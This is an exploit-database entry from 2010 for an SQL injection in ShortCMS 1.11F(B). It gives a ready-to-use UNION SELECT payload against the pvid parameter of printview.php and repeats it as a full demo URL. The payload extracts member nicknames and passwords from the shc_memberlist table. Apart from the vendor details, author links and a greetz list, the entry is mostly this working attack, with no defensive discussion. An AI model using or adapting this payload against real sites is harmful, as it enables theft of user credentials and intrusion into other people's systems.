ShortCMS 1.11F(B) (con) - SQL Injection

Author: Gamoscu
type: webapps
platform: php
port: 
date_added: 2010-02-23 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

ShortCMS v. 1.11F(B) (con) SQL Injection  Vulnerability

###########################

Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : ShortCMS
Download  : http://www.shortcms.de/index.php?dwnldct

###########################

[ Vulnerable File ]

printview.php?func=con&pvid= [ SQL ]


[ XpL ]

-1/**/union/**/all/**/select/**/1,2,concat(member_nick,0x3a,member_pass),4,5,6,7,8,9,10,11,12,13,14,15+from+shc_memberlist--


[ Demo]


http://server/kde/printview.php?func=con&pvid=-1/**/union/**/all/**/select/**/1,2,concat(member_nick,0x3a,member_pass),4,5,6,7,8,9,10,11,12,13,14,15+from+shc_memberlist--


##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################